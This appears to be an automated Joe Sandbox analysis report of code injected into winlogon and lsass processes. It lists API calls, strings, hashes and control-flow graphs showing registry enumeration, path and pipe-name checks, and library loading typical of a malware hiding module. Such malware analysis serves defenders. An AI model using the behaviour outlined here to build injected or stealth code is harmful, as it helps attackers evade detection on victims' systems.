                                                                                • API String ID: 2588686239-3893581201
                                                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction ID: e970a9a43252eabe4026e981e98462d928581c4f7ecabb01d41ac0a41422b202
                                                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction Fuzzy Hash: C9111A36608BC186D764CB16F44429AB7A5F7C9BD0F54412AEE8D83B5ADF38C490CF10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction ID: 27ad33a178c3179211db166796635154f32230ec8d19586fae6dd97a3da5b9d2
                                                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction Fuzzy Hash: C2115132218BC582EB608F16F44436977A0F788B98F19422ADF8D07765DF3CC991CB10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                • String ID: InitializeCriticalSectionEx
                                                                                • API String ID: 539475747-3084827643
                                                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction ID: 812ea173a3d6579247d231d3f10f819a0e9ab9d21a9d756a00f462390e53500e
                                                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction Fuzzy Hash: E5F082217647C191EB059B43F4486956721FB88BD0F4A502BAA5E43B56CF38C9D5CF31
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2686009347.000002E991780000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991780000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: try_get_function
                                                                                • String ID: November$October
                                                                                • API String ID: 2742660187-1636048786
                                                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction ID: 75bb176bec5a7995b01361e88268d9f26a36d38c58ddc318ebdf1d762285d409
                                                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction Fuzzy Hash: D5E09B613805C391FA059753F58D2D42251F744744F5B506B962D06257CF38C8CA8B60
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684384401.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991720000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: try_get_function
                                                                                • String ID: November$October
                                                                                • API String ID: 2742660187-1636048786
                                                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction ID: e24e2784e8acbe38f7e01e8af0d934bc7b84b0593c2869dacb804e5941c5eac0
                                                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction Fuzzy Hash: C2E092613829C792FF0A9B53F44C2E42261BB98740F5B552B962A06257CF38CAD78B30
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Valuetry_get_function
                                                                                • String ID: FlsSetValue
                                                                                • API String ID: 738293619-3750699315
                                                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction ID: 5fb10effba1df8d56895d206b50cf73f54771176c0a446976a8d18c6a2348832
                                                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction Fuzzy Hash: 31E06D617646C291EA054B53F84D6942222BB887C0F4A402BDA0A46357CF38C8D5CF32
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction ID: 8e675e63a18b3d2e0f4bfffe7c2fff3115d9074265ab9aa8a56be4a5a175b3da
                                                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction Fuzzy Hash: 34219522745FC5C2EB118F5AE40825AF3A0FB89BD5F16411ADE8D97B16EF78C582CB10
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction ID: 5bac14118ec26c9123086b6f7a104a73f0c5a4fcf2ba36b914a97d33eb5ad182
                                                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction Fuzzy Hash: CCE03971751A45C6E7088B63D80834936F1FB89B82F4A8028C90947351DF7D84D9CB61

                                                                                Execution Graph

                                                                                Execution Coverage:0.9%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:141
                                                                                Total number of Limit Nodes:10
                                                                                execution_graph 14592 213bdce26f0 14593 213bdce276f 14592->14593 14594 213bdce27d1 GetFileType 14593->14594 14606 213bdce2961 14593->14606 14595 213bdce27df StrCpyW 14594->14595 14596 213bdce27f5 14594->14596 14597 213bdce2804 14595->14597 14608 213bdce1ab8 GetFinalPathNameByHandleW 14596->14608 14602 213bdce280e 14597->14602 14604 213bdce28b3 14597->14604 14600 213bdce3930 StrCmpNIW 14600->14604 14602->14606 14613 213bdce3930 14602->14613 14616 213bdce3200 StrCmpIW 14602->14616 14620 213bdce1e4c 14602->14620 14604->14600 14605 213bdce3200 4 API calls 14604->14605 14604->14606 14607 213bdce1e4c 2 API calls 14604->14607 14605->14604 14607->14604 14609 213bdce1b21 14608->14609 14610 213bdce1ae2 StrCmpNIW 14608->14610 14609->14597 14610->14609 14611 213bdce1afc lstrlenW 14610->14611 14611->14609 14612 213bdce1b0e StrCpyW 14611->14612 14612->14609 14614 213bdce393d StrCmpNIW 14613->14614 14615 213bdce3952 14613->14615 14614->14615 14615->14602 14617 213bdce3232 StrCpyW StrCatW 14616->14617 14618 213bdce3249 PathCombineW 14616->14618 14619 213bdce3252 14617->14619 14618->14619 14619->14602 14621 213bdce1e6c 14620->14621 14622 213bdce1e63 14620->14622 14621->14602 14624 213bdce1554 14622->14624 14625 213bdce15a4 14624->14625 14628 213bdce156e 14624->14628 14625->14621 14626 213bdce158d StrCmpW 14626->14628 14627 213bdce1585 StrCmpIW 14627->14628 14628->14625 14628->14626 14628->14627 14629 213bdce21cc 14631 213bdce21fd 14629->14631 14630 213bdce22e8 14631->14630 14632 213bdce231d 14631->14632 14638 213bdce2221 14631->14638 14633 213bdce2391 14632->14633 14634 213bdce2322 14632->14634 14633->14630 14637 213bdce30b4 7 API calls 14633->14637 14647 213bdce30b4 GetProcessHeap 14634->14647 14636 213bdce2263 StrCmpNIW 14636->14638 14637->14630 14638->14630 14638->14636 14640 213bdce1d60 14638->14640 14641 213bdce1d8f GetProcessHeap 14640->14641 14642 213bdce1e32 __free_lconv_mon 14640->14642 14643 213bdce1db0 _set_errno_from_matherr 14641->14643 14642->14638 14643->14642 14644 213bdce1554 2 API calls 14643->14644 14646 213bdce1e18 GetProcessHeap 14643->14646 14644->14646 14646->14642 14653 213bdce30f0 _set_errno_from_matherr 14647->14653 14648 213bdce31d1 GetProcessHeap 14649 213bdce31e5 __free_lconv_mon 14648->14649 14649->14630 14650 213bdce31cc 14650->14648 14651 213bdce315e StrCmpNIW 14651->14653 14652 213bdce1d60 4 API calls 14652->14653 14653->14648 14653->14650 14653->14651 14653->14652 14654 213bdce1c28 14660 213bdce1650 GetProcessHeap 14654->14660 14656 213bdce1c3e Sleep SleepEx 14658 213bdce1c37 14656->14658 14658->14656 14659 213bdce15c0 StrCmpIW StrCmpW 14658->14659 14712 213bdce18dc 14658->14712 14659->14658 14661 213bdce1670 _set_errno_from_matherr 14660->14661 14730 213bdce1274 GetProcessHeap 14661->14730 14663 213bdce1678 14734 213bdce1000 GetProcessHeap 14663->14734 14665 213bdce1680 14666 213bdce1274 2 API calls 14665->14666 14667 213bdce1689 14666->14667 14668 213bdce1274 2 API calls 14667->14668 14669 213bdce1692 14668->14669 14670 213bdce1274 2 API calls 14669->14670 14671 213bdce169b 14670->14671 14672 213bdce1000 2 API calls 14671->14672 14673 213bdce16a4 14672->14673 14674 213bdce1000 2 API calls 14673->14674 14675 213bdce16ad 14674->14675 14676 213bdce1000 2 API calls 14675->14676 14677 213bdce16b6 RegOpenKeyExW 14676->14677 14678 213bdce18ce 14677->14678 14679 213bdce16e8 RegOpenKeyExW 14677->14679 14678->14658 14680 213bdce1711 14679->14680 14681 213bdce1727 RegOpenKeyExW 14679->14681 14738 213bdce12c8 RegQueryInfoKeyW 14680->14738 14683 213bdce1762 RegOpenKeyExW 14681->14683 14684 213bdce174b 14681->14684 14685 213bdce179d RegOpenKeyExW 14683->14685 14686 213bdce1786 14683->14686 14749 213bdce104c RegQueryInfoKeyW 14684->14749 14690 213bdce17c1 14685->14690 14691 213bdce17d8 RegOpenKeyExW 14685->14691 14689 213bdce12c8 11 API calls 14686->14689 14687 213bdce171d RegCloseKey 14687->14681 14693 213bdce1793 RegCloseKey 14689->14693 14694 213bdce12c8 11 API calls 14690->14694 14695 213bdce17fc 14691->14695 14696 213bdce1813 RegOpenKeyExW 14691->14696 14693->14685 14697 213bdce17ce RegCloseKey 14694->14697 14698 213bdce12c8 11 API calls 14695->14698 14699 213bdce184e RegOpenKeyExW 14696->14699 14700 213bdce1837 14696->14700 14697->14691 14703 213bdce1809 RegCloseKey 14698->14703 14701 213bdce1872 14699->14701 14702 213bdce1889 RegOpenKeyExW 14699->14702 14704 213bdce104c 4 API calls 14700->14704 14705 213bdce104c 4 API calls 14701->14705 14706 213bdce18ad 14702->14706 14707 213bdce18c4 RegCloseKey 14702->14707 14703->14696 14708 213bdce1844 RegCloseKey 14704->14708 14709 213bdce187f RegCloseKey 14705->14709 14710 213bdce104c 4 API calls 14706->14710 14707->14678 14708->14699 14709->14702 14711 213bdce18ba RegCloseKey 14710->14711 14711->14707 14757 213bdce14b4 14712->14757 14755 213bdcf3170 14730->14755 14733 213bdce12ba _set_errno_from_matherr 14733->14663 14735 213bdcf3170 _set_errno_from_matherr 14734->14735 14736 213bdce101b GetProcessHeap 14735->14736 14737 213bdce103d _set_errno_from_matherr 14736->14737 14737->14665 14739 213bdce1334 GetProcessHeap 14738->14739 14742 213bdce1499 __free_lconv_mon 14738->14742 14746 213bdce134b __free_lconv_mon _set_errno_from_matherr 14739->14746 14740 213bdce135d RegEnumValueW 14740->14746 14741 213bdce1485 GetProcessHeap 14741->14742 14742->14687 14743 213bdce1554 2 API calls 14743->14746 14744 213bdce142f lstrlenW GetProcessHeap 14744->14746 14745 213bdce13dd GetProcessHeap 14745->14746 14746->14740 14746->14741 14746->14743 14746->14744 14746->14745 14747 213bdce1454 StrCpyW 14746->14747 14748 213bdce1413 GetProcessHeap 14746->14748 14747->14746 14748->14746 14750 213bdce11b5 RegCloseKey 14749->14750 14754 213bdce10b9 __free_lconv_mon _set_errno_from_matherr 14749->14754 14750->14683 14751 213bdce10c7 RegEnumValueW 14751->14754 14752 213bdce1149 GetProcessHeap 14752->14754 14753 213bdce117f GetProcessHeap 14753->14754 14754->14750 14754->14751 14754->14752 14754->14753 14756 213bdce128f GetProcessHeap 14755->14756 14756->14733 14758 213bdce14d1 GetProcessHeap 14757->14758 14759 213bdce14f0 GetProcessHeap 14757->14759 14761 213bdce14ea __free_lconv_mon 14758->14761 14760 213bdce1505 __free_lconv_mon 14759->14760 14762 213bdce152a GetProcessHeap HeapFree 14760->14762 14761->14758 14761->14759 14763 213bdcb2908 14765 213bdcb2936 14763->14765 14764 213bdcb2a2b LoadLibraryA 14764->14765 14765->14764 14766 213bdcb2aa7 14765->14766

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 10 213bdce26f0-213bdce2774 call 213bdcfeca0 13 213bdce298f-213bdce29b2 10->13 14 213bdce277a-213bdce277d 10->14 14->13 15 213bdce2783-213bdce2791 14->15 15->13 16 213bdce2797-213bdce27dd call 213bdce8d50 * 3 GetFileType 15->16 23 213bdce27df-213bdce27f3 StrCpyW 16->23 24 213bdce27f5-213bdce27ff call 213bdce1ab8 16->24 25 213bdce2804-213bdce2808 23->25 24->25 27 213bdce280e-213bdce2827 call 213bdce3264 call 213bdce3930 25->27 28 213bdce28b3-213bdce28b9 25->28 41 213bdce285e-213bdce28a8 call 213bdcfeca0 27->41 42 213bdce2829-213bdce2858 call 213bdce3264 call 213bdce3200 call 213bdce1e4c 27->42 30 213bdce28bc-213bdce28c1 28->30 32 213bdce28df 30->32 33 213bdce28c3-213bdce28c6 30->33 36 213bdce28e1-213bdce28fa call 213bdce3264 call 213bdce3930 32->36 33->32 35 213bdce28c8-213bdce28cb 33->35 35->32 39 213bdce28cd-213bdce28d0 35->39 51 213bdce293b-213bdce293d 36->51 52 213bdce28fc-213bdce292b call 213bdce3264 call 213bdce3200 call 213bdce1e4c 36->52 39->32 43 213bdce28d2-213bdce28d5 39->43 41->13 53 213bdce28ae 41->53 42->13 42->41 43->32 47 213bdce28d7-213bdce28dd 43->47 47->32 47->36 57 213bdce2961-213bdce2964 51->57 58 213bdce293f-213bdce295c call 213bdce86a0 51->58 52->51 76 213bdce292d-213bdce2937 52->76 53->27 60 213bdce296e-213bdce2971 57->60 61 213bdce2966-213bdce296c 57->61 58->30 66 213bdce298c 60->66 67 213bdce2973-213bdce2976 60->67 61->13 66->13 67->66 69 213bdce2978-213bdce297b 67->69 69->66 71 213bdce297d-213bdce2980 69->71 71->66 73 213bdce2982-213bdce2985 71->73 73->66 75 213bdce2987-213bdce298a 73->75 75->13 75->66 76->13 77 213bdce2939 76->77 77->30
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction ID: 958862e6774dca66b089c5131744cdd14b4e746f1ef3526f130444605cf24069
                                                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction Fuzzy Hash: 4B71C5B2208B8943EF38DF25D9483EAA796F768B8CF441136DD4947B89EE36D7058700

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 83 213bdce21cc-213bdce21f7 call 213bdcfece0 85 213bdce21fd-213bdce2206 83->85 86 213bdce220f-213bdce2212 85->86 87 213bdce2208-213bdce220c 85->87 88 213bdce23cd-213bdce23ed 86->88 89 213bdce2218-213bdce221b 86->89 87->86 90 213bdce2221-213bdce2233 89->90 91 213bdce231d-213bdce2320 89->91 90->88 94 213bdce2239-213bdce224f 90->94 92 213bdce2391-213bdce2394 91->92 93 213bdce2322-213bdce233c call 213bdce30b4 91->93 92->88 98 213bdce2396-213bdce23a9 call 213bdce30b4 92->98 93->88 103 213bdce2342-213bdce2358 93->103 96 213bdce2251-213bdce2261 94->96 97 213bdce227d-213bdce2288 call 213bdce1d28 94->97 96->97 100 213bdce2263-213bdce227b StrCmpNIW 96->100 104 213bdce22a9-213bdce22bb 97->104 111 213bdce228a-213bdce22a2 call 213bdce1d60 97->111 98->88 110 213bdce23ab-213bdce23b3 98->110 100->97 100->104 103->88 109 213bdce235a-213bdce2376 103->109 107 213bdce22bd-213bdce22bf 104->107 108 213bdce22cb-213bdce22cd 104->108 113 213bdce22c1-213bdce22c4 107->113 114 213bdce22c6-213bdce22c9 107->114 115 213bdce22cf-213bdce22d2 108->115 116 213bdce22d4 108->116 117 213bdce237a-213bdce238d 109->117 110->88 118 213bdce23b5-213bdce23bd 110->118 111->104 123 213bdce22a4-213bdce22a7 111->123 121 213bdce22d7-213bdce22da 113->121 114->121 115->121 116->121 117->117 122 213bdce238f 117->122 119 213bdce23c0-213bdce23cb 118->119 119->88 119->119 124 213bdce22dc-213bdce22e2 121->124 125 213bdce22e8-213bdce22eb 121->125 122->88 123->121 124->94 124->125 125->88 126 213bdce22f1-213bdce22f5 125->126 127 213bdce230c-213bdce2318 126->127 128 213bdce22f7-213bdce22fa 126->128 127->88 128->88 129 213bdce2300-213bdce2305 128->129 129->126 130 213bdce2307 129->130 130->88
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: S$dialer
                                                                                • API String ID: 756756679-3873981283
                                                                                • Opcode ID: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
                                                                                • Instruction ID: 3a2d983b68ad83ed8bba0886a699d0eb8f38031532de1a7e1fabcf3a0e442ea7
                                                                                • Opcode Fuzzy Hash: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
                                                                                • Instruction Fuzzy Hash: DA51C3B2B1472883EF61CF21D8487EDA3A6F72879CF449421DE4526B45EB36EB51C710

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction ID: 325ced8bc4b10fe40afa27ed344ff8a600cd24f0b2f34a19bded33e849df5107
                                                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction Fuzzy Hash: 99F044B2308A45A2EF60CB21F4983D96762F764B8CF849031CA494A558FF3DC74DC700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: da3653941ee27b4032445f916b986651388196774474ecb5996340d1f59d089c
                                                                                • Instruction ID: 59b5f99c823a3c1f80f8cb939782ca9080515687d05920005cded5b386632710
                                                                                • Opcode Fuzzy Hash: da3653941ee27b4032445f916b986651388196774474ecb5996340d1f59d089c
                                                                                • Instruction Fuzzy Hash: 37F04F6251ABC09BD7068B6188142D97FB1F78AF04F89C156C64487352DA3D8599C711

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: 3942458b2e602a87a53f3a6f36558e5fd963b0420189fb76057d3a0940dc335f
                                                                                • Instruction ID: 7acfc98fedcf48397cbe37345a46a18bbd34040895f1dbd09d5cc9c764857c60
                                                                                • Opcode Fuzzy Hash: 3942458b2e602a87a53f3a6f36558e5fd963b0420189fb76057d3a0940dc335f
                                                                                • Instruction Fuzzy Hash: 25E01271621A00D7EB08DF66D8083D976E2FB9DF19F48C024C9094B314EE3D8699C710

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                • Instruction ID: 35a2373febbd298c96ccda2e03ae3ebf42af853a822c4d32016ecaa8c58cdf20
                                                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                • Instruction Fuzzy Hash: AA1161B061CA0953FF22D721B90E7E92697B77430EF445235A906891D8FF3BF3488610

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00000213BDCE1650: GetProcessHeap.KERNEL32 ref: 00000213BDCE165B
                                                                                  • Part of subcall function 00000213BDCE1650: HeapAlloc.KERNEL32 ref: 00000213BDCE166A
                                                                                  • Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE16DA
                                                                                  • Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1707
                                                                                  • Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE1721
                                                                                  • Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1741
                                                                                  • Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE175C
                                                                                  • Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE177C
                                                                                  • Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE1797
                                                                                  • Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE17B7
                                                                                  • Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE17D2
                                                                                  • Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE17F2
                                                                                • Sleep.KERNEL32 ref: 00000213BDCE1C43
                                                                                • SleepEx.KERNELBASE ref: 00000213BDCE1C49
                                                                                  • Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE180D
                                                                                  • Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE182D
                                                                                  • Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE1848
                                                                                  • Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1868
                                                                                  • Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE1883
                                                                                  • Part of subcall function 00000213BDCE1650: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE18A3
                                                                                  • Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE18BE
                                                                                  • Part of subcall function 00000213BDCE1650: RegCloseKey.ADVAPI32 ref: 00000213BDCE18C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                • Instruction ID: a0f392aaf88b1dfc6e48b7e117115603c5291f4de9550e2820ced89c78e4f692
                                                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                • Instruction Fuzzy Hash: 2C3110B560860993FE51DF26D9483DE12A7AB64BDCF046032DE0987696FF32E7708350

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 188 213bdcb2908-213bdcb2973 call 213bdcb0f34 * 4 197 213bdcb2b8b 188->197 198 213bdcb2979-213bdcb297c 188->198 199 213bdcb2b8d-213bdcb2ba9 197->199 198->197 200 213bdcb2982-213bdcb2985 198->200 200->197 201 213bdcb298b-213bdcb298e 200->201 201->197 202 213bdcb2994-213bdcb29b2 201->202 202->197 204 213bdcb29b8-213bdcb29dc call 213bdcb0d6c 202->204 207 213bdcb29de-213bdcb2a09 call 213bdcb0d6c 204->207 208 213bdcb2a0b-213bdcb2a12 204->208 207->208 210 213bdcb2ab2-213bdcb2ab9 208->210 211 213bdcb2a18-213bdcb2a25 208->211 212 213bdcb2b6c-213bdcb2b89 210->212 213 213bdcb2abf-213bdcb2ad6 210->213 211->210 215 213bdcb2a2b-213bdcb2a39 LoadLibraryA 211->215 212->199 213->212 216 213bdcb2adc 213->216 217 213bdcb2a9d-213bdcb2aa5 215->217 218 213bdcb2a3b-213bdcb2a45 215->218 221 213bdcb2ae2-213bdcb2af7 216->221 217->215 219 213bdcb2aa7-213bdcb2aac 217->219 222 213bdcb2a48-213bdcb2a4c 218->222 219->210 223 213bdcb2b5b-213bdcb2b66 221->223 224 213bdcb2af9-213bdcb2b0a 221->224 225 213bdcb2a4e-213bdcb2a52 222->225 226 213bdcb2a9a 222->226 223->212 223->221 230 213bdcb2b0c-213bdcb2b13 224->230 231 213bdcb2b15-213bdcb2b19 224->231 227 213bdcb2a7d-213bdcb2a87 225->227 228 213bdcb2a54-213bdcb2a7b 225->228 226->217 232 213bdcb2a8d-213bdcb2a98 227->232 228->232 233 213bdcb2b48-213bdcb2b59 230->233 234 213bdcb2b1b-213bdcb2b22 231->234 235 213bdcb2b24-213bdcb2b28 231->235 232->222 233->223 233->224 234->233 236 213bdcb2b3a-213bdcb2b3e 235->236 237 213bdcb2b2a-213bdcb2b38 235->237 236->233 238 213bdcb2b40-213bdcb2b43 236->238 237->233 238->233
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000016.00000002.2708871624.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_22_2_213bdcb0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
